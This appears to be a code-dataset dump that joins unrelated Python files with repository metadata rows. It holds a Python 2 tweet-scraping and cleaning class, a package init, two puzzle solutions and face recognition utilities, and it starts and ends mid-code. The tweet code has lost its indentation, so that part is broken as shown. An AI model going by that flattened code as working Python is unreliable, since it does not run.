until = final_until
continue_search = True
run_counter = 1
while continue_search:
print "Collecting run", run_counter
run_counter += 1
# call user function and get date of last tweet found
last_date = self.get_user_tweets(user, tweets_per_run,
end_date=until)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = user + '/' + until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is a date proceed as normal - if the last_date
# hasn't changed, raise comment below
if self._validate_date(last_date):
until_minus_day_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until_minus_day = str(until_minus_day_object)[:10]
if last_date == until_minus_day:
# from experimentation sometimes a query of many tweets
# will get "stuck" on a day long before 500 tweets have
# been reached - solution is just increment day as usual
print "Tweets timeline incremented by only one day - may " \
"need larger tweets_per_run, or could just be " \
"regular stutter in querying timeline."
until = last_date
else:
# this increment is to avoid losing tweets at the edge
# between date queries - experimentation showed they can
# be lost without this redundancy - this means when tweets
# are read there may be duplicates that require deletion
new_until_date_object = datetime.datetime.strptime(last_date, '%Y-%m-%d') \
+ datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
else:
continue_search = False
# set data path to new output folder to read in new tweets easily
self.data_path = user
print "Total time to collect tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
#############################################################
# Methods to clean and prune tweets (probably used
# before visual inspection)
#############################################################
def keep_column_of_original_tweets(self):
""" Devote a column of self.tweets_df to the original, unaltered tweets.
Can be useful for comparison after cleaning.
This should be done before any cleaning functions are applied to the
"text" column of self.tweets_df.
"""
self.tweets_df["original_tweets"] = self.tweets_df["text"]
def lower_tweets(self):
""" Lowers case of text in all the tweets, usernames, mentions and
hashtags in the tweets_df dataframe, if the dataframe has those
columns.
"""
column_names = list(self.tweets_df.columns.values)
if "username" in column_names:
self.tweets_df["username"] = self.tweets_df.username.str.lower()
if "text" in column_names:
self.tweets_df["text"] = self.tweets_df.text.str.lower()
if "mentions" in column_names:
self.tweets_df["mentions"] = self.tweets_df.mentions.str.lower()
if "hashtags" in column_names:
self.tweets_df["hashtags"] = self.tweets_df.hashtags.str.lower()
def keep_only_unicode_tweet_text(self):
""" Keeps only tweets where tweet text is unicode. This drops the
occasional tweet that has a NaN value in dataset, which becomes a float
when read into tweets_df.
"""
self.tweets_df["text_type"] = self.tweets_df["text"].map(lambda text: type(text))
self.tweets_df = self.tweets_df[self.tweets_df.text_type == unicode]
del self.tweets_df["text_type"]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def _remove_urls_from_single_tweet(self, tweet):
""" Remove urls from text of a single tweet.
This uses python tweet parsing library that misses some tweets but
doesn't get hung up with evil regex taking too long.
"""
p = ttp.Parser()
result = p.parse(tweet)
for x in result.urls:
tweet = tweet.replace(x, "")
tweet = tweet.strip()
return tweet
def remove_urls_from_tweets(self):
""" Remove urls from all tweets in self.tweets_df
"""
start_time = time.time()
print "Removing urls from tweets..."
print "This may take a minute - cleaning rate is about 400,000" \
" tweets per minute"
self.tweets_df["text"] = self.tweets_df["text"].map(self._remove_urls_from_single_tweet)
minutes_to_complete = (time.time() - start_time)/60.
print "Time to complete:", round(minutes_to_complete,3), \
"minutes"
print "Tweets cleaned per minute:", round(len(self.tweets_df)/minutes_to_complete, 1)
def remove_punctuation_from_tweets(self):
""" Strip common punctuation from tweets in self.tweets_df
"""
self.tweets_df["text"] = self.tweets_df["text"].apply(lambda x:
''.join([i for i in x if i not in
string.punctuation]))
def drop_non_ascii_characters_from_tweets(self):
""" Remove all characters that are not standard ascii.
"""
self.tweets_df['text'] = self.tweets_df["text"].apply(lambda x:
''.join([i if 32 <= ord(i) < 126 else
"" for i in x]))
def _convert_date_to_standard(self, date_text):
""" Convert a date string of form u"yyyy/mm/dd" into form u"yyyy-mm-dd"
for use with the python date module.
"""
assert type(date_text) in (str, unicode)
date_text = date_text.replace('/', '-')
return date_text
def convert_tweet_dates_to_standard(self):
""" Convert tweet dates from form "yyyy/mm/dd" to "yyyy-mm-dd" in
tweets_df dataframe.
"""
self.tweets_df["date"] = self.tweets_df["date"].map(self._convert_date_to_standard)
def sort_tweets_by_date(self):
""" Sort tweets by their date - useful for any sort of time series
analysis, e.g. analyzing sentiment changes over time.
"""
self.tweets_df.sort_values("date", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_duplicate_tweets(self):
""" Drop duplicate tweets in tweets_df (except for the first instance
of each tweet)
"""
self.tweets_df.drop_duplicates("text", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_search_in_name(self):
""" Drop tweets that contain element from search_terms in either
username or mention (i.e., tweets where the search term in contained in
twitter handle of someone writing or mentioned in tweet). Default
values of terms list is search_terms attribute, but user can add
to self.search_terms attribute to drop by additional terms.
"""
if not self.search_terms:
print "search_terms is empty - add at least one term to " + \
"search_terms attribute"
return self
for term in self.search_terms:
assert type(term) in (str, unicode)
assert term # to make sure string isn't empty
# Drop the tweets that contain any of search terms in either a username
# or a mention
column_names = list(self.tweets_df.columns.values)
for term in self.search_terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def keep_tweets_with_terms(self, term_list):
""" Drops all the tweets in tweets_df that do NOT contain at least one
term from term_list. This is useful for handling data from Twitter API
search stream, where it is often easiest to collect a single big stream
using several search terms and then parse the stream later.
Sometimes even tweets collected with java collector don't contain
desired terms, so this can be useful there as well.
term_list (string or list of strings): collection of terms to drop on
"""
if type(term_list) == str:
assert len(term_list) > 0
keep_index = self.tweets_df[self.tweets_df.text.str.contains(term_list) == True].index
self.tweets_df = self.tweets_df.iloc[keep_index]
if type(term_list) == list:
keep_index = pd.core.index.Int64Index([], dtype='int64')
for term in term_list:
assert len(term) > 0
term_keep_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
keep_index = keep_index.append(term_keep_index)
keep_index = keep_index.drop_duplicates()
self.tweets_df = self.tweets_df.iloc[keep_index]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
#############################################################
# Methods to prune tweets (probably used after visual
# inspection)
#############################################################
def drop_by_term_in_name(self, terms):
""" Drop tweets that contain element from terms in either username or
mention. The terms parameter must be a list of strings.
This method is the same as drop_by_search_in_name method, except it
takes arbitrary input from user. This can be used to help get rid of
spam.
terms (list): python list of strings
"""
if not terms:
print "terms is empty - enter at least one search terms string"
return self
for term in terms:
assert type(term) in (str, unicode)
assert term
# Drop the tweets that contain any of terms in either a username
# or a mention
# don't need to set " == True", that is redundant
column_names = list(self.tweets_df.columns.values)
for term in terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_term_in_tweet(self, terms):
""" Drop tweets that contain element from terms in the tweet text.
Terms can be either a string (which is treated as one term) or a list
of strings (which area each treated as a separate drop case).
This is most useful for getting rid of repetitive or spammy tweets that
appear to be distorting data.
This is also useful for dropping retweets, which can be accomplished
by dropping tweets containing the string "rt @"
terms (string or python list of strings): terms that appear in tweets
we want to drop
"""
if type(terms) in (str, unicode):
text_index = self.tweets_df[self.tweets_df.text.str.contains(terms) == True].index
self.tweets_df.drop(text_index, inplace=True)
elif type(terms) == list:
for term in terms:
assert type(term) in (str, unicode)
assert len(term) > 0
text_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
self.tweets_df.drop(text_index, inplace=True)
else:
raise Exception("Input must be string or list of string.")
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_username_with_n_tweets(self, max_num_occurrences=1):
""" Drops all tweets by usernames that appear more than
max_num_occurrences times in tweets_df.
This function can be time consuming.
Dropping all users with more than 1 tweet should be a safe way to
filter out a lot of the spam.
"""
start_time = time.time()
print "Dropping tweets by repeated users..."
# get list of usernames that occur too much
repeat_user_counts = self.tweets_df["username"].value_counts()
for i in range(len(repeat_user_counts)):
if repeat_user_counts[i] <= max_num_occurrences:
break_index = i
break
repeated_usernames = list(repeat_user_counts[0:break_index].index)
print "Found", len(repeated_usernames), "users with more than", \
max_num_occurrences, "tweets in tweets_df"
# drop these usernames from tweets_df
percentile_num = len(repeated_usernames)//20
for i, twitter_username in enumerate(repeated_usernames):
if len(repeated_usernames) <= 100:
print "Dropping tweets from user", i
elif i%percentile_num == 0:
print "Finished", 5*i/percentile_num, "percent of user drops"
drop_index = self.tweets_df[self.tweets_df.username == twitter_username].index
self.tweets_df.drop(drop_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
print "Took", round((time.time() - start_time)/60.,3), \
"minutes to complete"
def add_stop_words(self, stopwords_item):
""" Add word or list of words to stop words used in create_word_bag.
The word might be a url or spam tag. A common case is parts of urls
that are parsed into words (e.g. from youtube) that appear repeatedly.
The new stopwords will appear at end of self.stop_words list, so user
can easily check to see which stopwords have been recently added by the
user.
stopwords: (string or list of strings):
"""
if type(stopwords_item) in (str, unicode):
if type(stopwords_item) == str:
# convert string to unicode if not unicode already
stopwords_item = stopwords_item.decode('utf-8')
self.stop_words = self.stop_words + [stopwords_item]
elif type(stopwords_item) == list:
for term in stopwords_item:
assert type(term) in (str, unicode)
assert len(term) > 0
unicode_terms_list = [term if type(term) == unicode
else term.decode('utf-8')
for term in stopwords_item]
self.stop_words = self.stop_words + unicode_terms_list
else:
raise Exception("Input must be string or list of strings.")
#############################################################
# Methods for investigating word frequencies
#############################################################
""" The create_word_freq_df method is used to create a dataframe
that gives the word occurrences and word frequencies of the top n words in
the corpus. This is created using the existing nltk object, and it is
changed depending on how many words we wish to inspect graphically.
This word frequency dataframe is fundamental object of interest, and is
stored in the word_freq_df attribute, which is a pandas dataframe.
For now the background corpus is derived from ~2.6 GB of twitter data,
composing about 72 million words. The word frequency rates from this
sample are stored in a frequency sample file that is then converted into
a python dictionary for fast lookup.
"""
def create_word_bag(self):
""" Takes tweet dataframe and outputs word_bag, which is a list of all
words in all tweets, with punctuation and stop words removed. word_bag
is contained inside the attribute self.word_bag.
This method will often be called repeatedly during data inspection, as
it needs to be redone every time some tweets are dropped from
tweets_df.
"""
start_time = time.time()
# Convert dataframe tweets column to python list of tweets, then join
# this list together into one long list of words
tweets_list = self.tweets_df["text"].tolist()
words_string = " ".join(tweets_list)
print "Time to make words_string: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
# Use nltk word tokenization to break list into words and remove
# stop words
tokens = nltk.word_tokenize(words_string)
print "Time to tokenize: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
self.word_bag = [word for word in tokens if word not in self.stop_words]
print "Time to compute word bag: ", round((time.time() - start_time)/60., 3), "minutes"
def make_nltk_object_from_word_bag(self, word_bag=None):
""" Creates nltk word statistical object from the current word_bag
attribute. word_bag is left as an input in case the user wants to
create an nltk object with an external word bag.
The most common method we'll use from this object is the
frequency method, i.e. freq_dist.freq(term), where term is word in
word bag.
Use print(freq_dist) to get the number of unique words in corpus, as
well as total number of words in corpus.
Can use freq_dist.most_common(50) to get list of 50 most common words
and the number of times each of them appears in text.
"""
if word_bag is None:
word_bag = self.word_bag
self.freq_dist = nltk.FreqDist(self.word_bag)
def create_word_freq_df(self, top_n_words):
""" Creates pandas dataframe called word_freq_df of the most common n
words in corpus, with columns:
occurrences: how often each of them occurred
frequency: word frequency in the corpus
frequency ratio: word relative frequency to background
log frequency ratio: log of the relative frequency to background rates
background_occur: the number of times word appears in background corpus
(The log is useful because, for example, a rate two times as high as
background has log ratio of +x, and a rate two times lower than
background rates has a log ratio of -x.)
n is the number of words we want to see. These words are draw in order
of how frequently they are found in the corpus, so a large number of
words should be chosen to make sure we find the interesting ones that
appear much more often than in background corpus. (If a word appears
often in our search corpus it may be because it also appear often in
the background corpus, which is not of interest.)
The actual words that were searched to collect the corpus are omitted
from this dataframe (as long as self.search_terms has been set).
n (int): number of most frequent words we want to appear in dataframe
"""
print "Creating word_freq_df..."
print "Takes about 1 minute per 1000 words"
start_time = time.time()
# make dataframe we'll use in plotting
num_words = top_n_words
word_frequencies_list = []
for word, occurrences in self.freq_dist.most_common(num_words):
# determine whether word appears in background dict; if it does
# not, the frequency ratio is set to zero
if word in self.search_terms:
continue
if word in self.background_dict.keys():
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background occurrences'])
print "Time to create word_freq_df: ", \
round((time.time() - start_time)/60., 4), "minutes"
self.word_freq_df = word_freq_df
def custom_word_frequency_dataframe(self, words):
""" Same function as create_word_freq_df except instead of
using top n words from corpus, a custom list of words is used. This
function returns the dataframe it creates instead of setting it to
word_freq_df. (The user can append what this function creates to
word_freq_df by hand with pd.concat(df1, df1).)
An example use case is to use a list of known words of interest to
construct a type of "word vector" for a particular word (presumably
the word searched on using Java tweet collector). For example, for
politics one might choose words like "conservative", "liberal",
"regulation" and "liberty" as a set of word axes, and then see how
twitter-searched words like "taxes", "Obamacare", etc. appear as word
vectors along these axes.
words: list of words to put in dataframe - each word is a string
"""
word_frequencies_list = []
words = [x.decode("utf-8") if type(x) == str else x for x in words]
for word in words:
# determine whether word appears in both background dict and corpus
# if it does not, the frequency ratio is set to zero
if word in self.search_terms:
continue
occurrences = self.freq_dist[word]
if word in self.background_dict.keys() and occurrences != 0:
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background_occur'])
return word_freq_df
def plot_word_frequencies(self, plot_string, dataframe=None):
""" Plots of given value about word, where plot_string is a string
that gives quantity to be plotted. This is just an example function,
user will want to use word_freq_df and matplotlib directly for more
detailed and better-looking plots.
Note that the plot can't display unicode characters correctly, so if a
word looks like a little box you'll have to pull up word_freq_df to see
what the character actually is.
plot_string (string): column of word_freq_df dataframe, e.g.
"occurrences", "frequency", "relative frequency",
"log relative frequency", etc.
dataframe (pandas dataframe): dataframe of the same form as
word_freq_df; if left empty then
self.word_freq_df is plotted
"""
if dataframe is None:
dataframe = self.word_freq_df
num_words = len(dataframe)
try:
dataframe.set_index("word")[plot_string].plot.barh(figsize=(20,
num_words/2.), fontsize=30, color="c");
plt.title(plot_string, fontsize=30);
ax = plt.axes();
ax.xaxis.grid(linewidth=4);
except:
raise Exception("Input string must be column name of word_freq_df")
""" This was more customized code that can be used later if needed - for
now the pandas default plotting code is good enough for most purposes
sns.set(style="darkgrid")
num_words = len(self.word_freq_df)
# Initialize the matplotlib figure - the second number in figure gives
# height, this will need to depend on how many words are included in
# figure
f, ax = plt.subplots(figsize=(16, num_words/2.))
plt.yticks(fontsize=20)
plt.xticks(fontsize=20)
# Plot the frequencies
sns.set_color_codes("pastel")
sns.barplot(x=plot_string, y="word", data=self.word_freq_df,
label="frequency", color="b")
# Add informative axis label
max_value = self.word_freq_df.iloc[0].frequency # find maximum frequency
# adjust axis to be slightly larger than this max frequency
ax.set(xlim=(0, max_value*1.1), ylabel="", xlabel="Word frequency")
ax.set_xlabel(plot_string, fontsize=30)
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
ax.tick_params(axis='x', labelsize=20) # size of numerical labels
"""
#############################################################
# Methods to inspect tweets in tweets_df dataframe
#############################################################
""" These methods are used to inspect tweets of interest in the main
dataframe tweets_df. A typical workflow is to visualize tweet word
frequencies using visualization functions, then inspect a sample of tweets
that contain a word of interest. If these tweets appear to be unwanted they
can then be dropped using the dropping functions above.
Note about displaying tweets in pandas in readable form: need to set
pd.set_option('display.max_colwidth', -1) and/or
pd.set_option('display.width',800)
This makes it so entire tweet is displayed without cutoff when only tweets
are presented in dataframe.
Can enter pd.describe_option('display') to get comprehensive list of
settings for ipython displays.
"""
def tweets_containing(self, term):
""" Returns all tweets that contain term from tweets_df.
Term is a string.
The returned object is a dataframe that contains the rows of tweets_df
dataframe that have tweets containing term.
term (string): term of interest
"""
assert type(term) in (str, unicode)
assert term
tweets_containing = self.tweets_df[self.tweets_df.text.str.contains(term) == True]
print len(tweets_containing), "tweets contain this term"
return tweets_containing[["username", "text"]]
def tweets_by(self, username):
""" Returns all tweets by username from tweets_df.
Similar to above function except searches by username rather than
tweet text.
username (string): username of interest
"""
assert type(username) in (str, unicode)
assert username
tweets_by = self.tweets_df[self.tweets_df.username == username]
return tweets_by[["username", "text"]]
| 396 | 0 | 54 |
35399c5f7200466f779bc16de6978d488fb725b7 | 399 | py | Python | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | 2 | 2017-08-08T03:30:25.000Z | 2017-12-02T19:10:38.000Z | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | null | null | null | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Reexport"""
from __future__ import print_function, division, unicode_literals
from .model import Model, Argument, BaseAdapter
from .exception import ArgumentError, ArgumentMissError, ArgumentInvalidError
__version__ = "0.0.2"
__all__ = ["ArgumentError", "ArgumentMissError", "ArgumentInvalidError",
"Model", "Argument", "BaseAdapter"]
| 26.6 | 77 | 0.736842 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Reexport"""
from __future__ import print_function, division, unicode_literals
from .model import Model, Argument, BaseAdapter
from .exception import ArgumentError, ArgumentMissError, ArgumentInvalidError
__version__ = "0.0.2"
__all__ = ["ArgumentError", "ArgumentMissError", "ArgumentInvalidError",
"Model", "Argument", "BaseAdapter"]
| 0 | 0 | 0 |
eea6820d66c1cc7a727aa191616c827de43dab06 | 433 | py | Python | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | 3 | 2020-06-25T21:04:02.000Z | 2021-05-12T03:33:19.000Z | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | null | null | null | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | 1 | 2020-06-25T21:04:06.000Z | 2020-06-25T21:04:06.000Z | # Author: btjanaka (Bryon Tjanaka)
# Problem: (Kattis) missingnumbers
# Title: Missing Numbers
# Link: https://open.kattis.com/problems/missingnumbers
# Idea: Keep counting.
# Difficulty: easy
# Tags: implementation
n = int(input())
cur = 1
num_printed = 0
for _ in range(n):
k = int(input())
while cur < k:
num_printed += 1
print(cur)
cur += 1
cur = k + 1
if num_printed == 0: print("good job")
| 21.65 | 55 | 0.632794 | # Author: btjanaka (Bryon Tjanaka)
# Problem: (Kattis) missingnumbers
# Title: Missing Numbers
# Link: https://open.kattis.com/problems/missingnumbers
# Idea: Keep counting.
# Difficulty: easy
# Tags: implementation
n = int(input())
cur = 1
num_printed = 0
for _ in range(n):
k = int(input())
while cur < k:
num_printed += 1
print(cur)
cur += 1
cur = k + 1
if num_printed == 0: print("good job")
| 0 | 0 | 0 |
f490e6a25b99549407a4432f866c4c80cbdaff53 | 339 | py | Python | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
"""Unga programmerare kodkalender 2020, lucka 3."""
# https://ungaprogrammerare.se/kodkalender/lucka-3/
import functools
import math
import operator
a = math.factorial(100)
b = functools.reduce(operator.mul, range(2, 165, 2))
how_many = round(a / b)
print(f"Antal delar: {how_many}")
# Antal delar: 40599194442
| 21.1875 | 52 | 0.731563 | #! /usr/bin/env python3
"""Unga programmerare kodkalender 2020, lucka 3."""
# https://ungaprogrammerare.se/kodkalender/lucka-3/
import functools
import math
import operator
a = math.factorial(100)
b = functools.reduce(operator.mul, range(2, 165, 2))
how_many = round(a / b)
print(f"Antal delar: {how_many}")
# Antal delar: 40599194442
| 0 | 0 | 0 |
d25e0e3402b84408e43fdbf5a922a14a3ddebf16 | 13,327 | py | Python | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | 1 | 2020-02-27T07:46:24.000Z | 2020-02-27T07:46:24.000Z | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | null | null | null | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | 2 | 2019-04-25T22:56:41.000Z | 2019-07-01T21:12:21.000Z | import datetime
import math
import os
import pickle
import random
import shutil
import time
import zipfile
import cv2 as cv
import numpy as np
import torch
from PIL import Image
from flask import request
from scipy.stats import norm
from torch import nn
from torch.utils.data import Dataset
from torchvision import transforms
from tqdm import tqdm
from werkzeug.utils import secure_filename
from align_faces import get_reference_facial_points, warp_and_crop_face
from config import STATIC_DIR, UPLOAD_DIR
from config import image_h, image_w, device, logger
from models import resnet101
from mtcnn.detector import detect_faces
from utils.common import ensure_folder, resize, AverageMeter
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
transformer = data_transforms['val']
times = AverageMeter()
config = HParams()
checkpoint = 'repo/face/insight-face-v3.pt'
logger.info('loading model: {}...'.format(checkpoint))
model = resnet101(config)
model.load_state_dict(torch.load(checkpoint))
model = nn.DataParallel(model)
model = model.to(device)
model.eval()
# model params
threshold = 76.75066649278368
mu_0 = 89.76046947988898
sigma_0 = 4.498024182861556
mu_1 = 42.66766813673472
sigma_1 = 8.62761102672923
class FaceNotFoundError(Exception):
"""Base class for other exceptions"""
pass
if __name__ == "__main__":
compare('id_card.jpg', 'photo_1.jpg')
compare('id_card.jpg', 'photo_2.jpg')
compare('id_card.jpg', 'photo_3.jpg')
compare('id_card.jpg', 'photo_4.jpg')
| 29.161926 | 109 | 0.648758 | import datetime
import math
import os
import pickle
import random
import shutil
import time
import zipfile
import cv2 as cv
import numpy as np
import torch
from PIL import Image
from flask import request
from scipy.stats import norm
from torch import nn
from torch.utils.data import Dataset
from torchvision import transforms
from tqdm import tqdm
from werkzeug.utils import secure_filename
from align_faces import get_reference_facial_points, warp_and_crop_face
from config import STATIC_DIR, UPLOAD_DIR
from config import image_h, image_w, device, logger
from models import resnet101
from mtcnn.detector import detect_faces
from utils.common import ensure_folder, resize, AverageMeter
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
transformer = data_transforms['val']
times = AverageMeter()
class HParams:
def __init__(self):
self.pretrained = False
self.use_se = True
config = HParams()
checkpoint = 'repo/face/insight-face-v3.pt'
logger.info('loading model: {}...'.format(checkpoint))
model = resnet101(config)
model.load_state_dict(torch.load(checkpoint))
model = nn.DataParallel(model)
model = model.to(device)
model.eval()
# model params
threshold = 76.75066649278368
mu_0 = 89.76046947988898
sigma_0 = 4.498024182861556
mu_1 = 42.66766813673472
sigma_1 = 8.62761102672923
class FaceNotFoundError(Exception):
"""Base class for other exceptions"""
pass
def align_face(img_fn, facial5points):
raw = cv.imread(img_fn, True)
facial5points = np.reshape(facial5points, (2, 5))
crop_size = (image_h, image_w)
default_square = True
inner_padding_factor = 0.25
outer_padding = (0, 0)
output_size = (image_h, image_w)
# get the reference 5 landmarks position in the crop settings
reference_5pts = get_reference_facial_points(
output_size, inner_padding_factor, outer_padding, default_square)
# dst_img = warp_and_crop_face(raw, facial5points)
dst_img = warp_and_crop_face(raw, facial5points, reference_pts=reference_5pts, crop_size=crop_size)
return dst_img
def get_central_face_attributes(full_path):
try:
img = Image.open(full_path).convert('RGB')
bounding_boxes, landmarks = detect_faces(img)
if len(landmarks) > 0:
i = select_central_face(img.size, bounding_boxes)
return True, [bounding_boxes[i]], [landmarks[i]]
except KeyboardInterrupt:
raise
except ValueError:
pass
return False, None, None
def get_all_face_attributes(full_path):
img = Image.open(full_path).convert('RGB')
bounding_boxes, landmarks = detect_faces(img)
return bounding_boxes, landmarks
def select_central_face(im_size, bounding_boxes):
width, height = im_size
nearest_index = -1
nearest_distance = 100000
for i, b in enumerate(bounding_boxes):
x_box_center = (b[0] + b[2]) / 2
y_box_center = (b[1] + b[3]) / 2
x_img = width / 2
y_img = height / 2
distance = math.sqrt((x_box_center - x_img) ** 2 + (y_box_center - y_img) ** 2)
if distance < nearest_distance:
nearest_distance = distance
nearest_index = i
return nearest_index
def draw_bboxes(img, bounding_boxes, facial_landmarks=[]):
for b in bounding_boxes:
cv.rectangle(img, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255), 1)
for p in facial_landmarks:
for i in range(5):
cv.circle(img, (int(p[i]), int(p[i + 5])), 1, (0, 255, 0), -1)
break # only first
return img
def get_image(filename, flip=False, draw=True):
has_face, bboxes, landmarks = get_central_face_attributes(filename)
if not has_face:
raise FaceNotFoundError(filename)
img = align_face(filename, landmarks)
if flip:
img = np.flip(img, 1)
img = transforms.ToPILImage()(img)
img = transformer(img)
img = img.to(device)
if draw:
logger.info('drawing bboxes: {}'.format(filename))
bboxes, landmarks = get_all_face_attributes(filename)
pic = cv.imread(filename)
pic = draw_bboxes(pic, bboxes, landmarks)
cv.imwrite(filename, pic)
return img
def get_image_batch(filename, draw=True):
has_face, bboxes, landmarks = get_central_face_attributes(filename)
if not has_face:
raise FaceNotFoundError(filename)
img = align_face(filename, landmarks)
img_0 = img
img_1 = np.flip(img.copy(), 1)
img_0 = transforms.ToPILImage()(img_0)
img_0 = transformer(img_0)
img_0 = img_0.to(device)
img_1 = transforms.ToPILImage()(img_1)
img_1 = transformer(img_1)
img_1 = img_1.to(device)
if draw:
logger.info('drawing bboxes: {}'.format(filename))
bboxes, landmarks = get_all_face_attributes(filename)
pic = cv.imread(filename)
pic = draw_bboxes(pic, bboxes, landmarks)
cv.imwrite(filename, pic)
return img_0, img_1
def compare(fn_0, fn_1):
logger.info('fn_0: ' + fn_0)
logger.info('fn_1: ' + fn_1)
img0 = get_image(fn_0)
img1 = get_image(fn_1)
imgs = torch.zeros([2, 3, 112, 112], dtype=torch.float)
imgs[0] = img0
imgs[1] = img1
imgs = imgs.to(device)
with torch.no_grad():
output = model(imgs)
feature0 = output[0].cpu().numpy()
feature1 = output[1].cpu().numpy()
x0 = feature0 / np.linalg.norm(feature0)
x1 = feature1 / np.linalg.norm(feature1)
cosine = np.dot(x0, x1)
theta = math.acos(cosine)
theta = theta * 180 / math.pi
logger.info('theta: ' + str(theta))
prob = get_prob(theta)
logger.info('prob: ' + str(prob))
return prob, theta < threshold
def get_prob(theta):
prob_0 = norm.pdf(theta, mu_0, sigma_0)
prob_1 = norm.pdf(theta, mu_1, sigma_1)
total = prob_0 + prob_1
return prob_1 / total
def search(full_path):
img = get_image(full_path)
imgs = torch.zeros([1, 3, 112, 112], dtype=torch.float)
imgs[0] = img
imgs = imgs.to(device)
with torch.no_grad():
output = model(imgs)
feature = output[0].cpu().numpy()
x = feature / np.linalg.norm(feature)
with open('static/stars.pkl', 'rb') as file:
data = pickle.load(file)
names = data['names']
files = data['files']
features = data['features']
cosine = np.dot(features, x)
cosine = np.clip(cosine, -1, 1)
logger.info('cosine.shape: ' + str(cosine.shape))
max_index = int(np.argmax(cosine))
max_value = cosine[max_index]
logger.info('max_index: ' + str(max_index))
logger.info('max_value: ' + str(max_value))
logger.info('name: ' + names[max_index])
logger.info('file: ' + files[max_index])
theta = math.acos(max_value)
theta = theta * 180 / math.pi
logger.info('theta: ' + str(theta))
prob = get_prob(theta)
logger.info('prob: ' + str(prob))
return names[max_index], prob, files[max_index]
def get_feature(full_path):
imgs = torch.zeros([2, 3, 112, 112], dtype=torch.float)
